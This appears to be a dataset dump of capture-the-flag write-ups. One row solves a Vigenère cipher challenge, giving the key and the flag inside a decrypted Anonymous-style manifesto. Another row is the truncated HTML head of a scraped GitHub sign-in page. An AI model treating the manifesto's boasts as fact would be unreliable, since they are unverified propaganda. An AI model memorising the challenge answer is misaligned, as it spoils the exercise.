text_chunk
stringlengths
151
703k
This is Vigenere cipher. From the encrypted flag `zdat{qyyegcuvvurlqfy}`, we try to decrypt with `flag{}` as known plaintext and recover the key `anonymous`. Fully decrypted text: ```There are many theories about us. That we’re anarchists, kids, crazy film-buffs that saw one too many superhero movies. The truth is, we are all these things. Anonymous is a symbol, like the flag a country flies. The flag is the symbol of the country. Our masks are our national identity. We are not Anonymous – we represent the ideals of Anonymous. Truth, freedom and the removal of censorship. Like any symbol, we affix it wherever we go, as you have seen from street protests. We have no leaders, civilians or soldiers. We are all one. We run operations because that is what the group decides to do. We choose targets because that is what the people who represent the ideals of Anonymous want to fight for. The world is in trouble. We see it every day – war, poverty, murder. Every day we are bombarded with news and images, as we sit at home safe in the knowledge that we are powerless, that “better” minds are dealing with the situation. But what if you could be the change you want to see? I’m twenty five years old. I went to school and college. I fought for my country then got a job and paid my taxes. If you met me on the street I wouldn’t even register on your radar. I am just another person in a sea of faces. But in cyberspace we are different. We helped free the people of Egypt. We helped fight against Israel as it attempted genocide. We exposed more than fifty thousand paedophiles around the world. We fought the drug cartels. We have taken to the streets to fight for the rights you are letting slip through your fingers. We are Anonymous. The flag is "flag{classicvigenere}" In today’s world we are seen as terrorists or at best dangerous anarchists. We’re called “cowards” and “posers” for hiding behind masks, but who is the real poser? We take away the face and leave only the message. Behind the mask we could be anyone, which is why we are judged by what we say and do, not who we are or what we have. We exist without nationality, skin colour or religious bias.```
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-bsgVyD4TU04rcZQ2EJX7gOMOE0xmdR7CpMuF0QJtlfhckodWXv4ROADbS6UL+4SIKq7TOBhcgAo+UFg02gPACw==" type="application/javascript" src="https://github.githubassets.com/assets/unsupported-6ec815c8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-t5G/LRsucWX21MbDfGFf7sTTtyjt1F5aUmcl7og05ESsa4UCK0Z7lulzwRBmsknlp9ClR18h8zq9wB1f8ZohVw==" type="application/javascript" src="https://github.githubassets.com/assets/settings-b791bf2d.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Zs5YD4s3dk6P2ub+AmOI28tmVWX2fTWqoTtisT6GoYIbwQwPcUZc7KFha4xvQ1PMuhiZMod5pdpYLX/2bg29Yg==" type="application/javascript" src="https://github.githubassets.com/assets/sessions-66ce580f.js"></script> <meta name="viewport" content="width=device-width"> <title>Sign in to GitHub · GitHub</title> <meta name="description" content="GitHub is where people build software. More than 73 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta property="og:url" content="https://github.com"> <meta property="og:site_name" content="GitHub"> <meta property="og:title" content="Build software better, together"> <meta property="og:description" content="GitHub is where people build software. More than 73 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-logo.png"> <meta property="og:image:type" content="image/png"> <meta property="og:image:width" content="1200"> <meta property="og:image:height" content="1200"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-mark.png"> <meta property="og:image:type" content="image/png"> <meta property="og:image:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png"> <meta property="og:image:type" content="image/png"> <meta property="og:image:width" content="1200"> <meta property="og:image:height" content="620"> <meta property="twitter:site" content="github"> <meta property="twitter:site:id" content="13334762"> <meta property="twitter:creator" content="github"> <meta property="twitter:creator:id" content="13334762"> <meta property="twitter:card" content="summary_large_image"> <meta property="twitter:title" content="GitHub"> <meta property="twitter:description" content="GitHub is where people build software. More than 73 million people use GitHub to discover, fork, and contribute to over 200 million projects."> <meta property="twitter:image:src" content="https://github.githubassets.com/images/modules/open_graph/github-logo.png"> <meta property="twitter:image:width" content="1200"> <meta property="twitter:image:height" content="1200"> <link rel="assets" href="https://github.githubassets.com/"> <meta name="request-id" content="BB4C:785C:11D4A29:12F470C:61830784" data-pjax-transient="true" /><meta name="html-safe-nonce" content="ba2b65318795f83c783ff257941a7e781e27aed5a8e3ff659a54e48f23637f9e" data-pjax-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IkJCNEM6Nzg1QzoxMUQ0QTI5OjEyRjQ3MEM6NjE4MzA3ODQiLCJ2aXNpdG9yX2lkIjoiNjM0MDg0MTU0MTM1NTExMjMyNCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="7a0c92e51acba73485dc4cb7ca6cbaf02fb8c9fd2bfb7f01a81125fe4bfd4912" data-pjax-transient="true" /> <meta name="github-keyboard-shortcuts" content="" 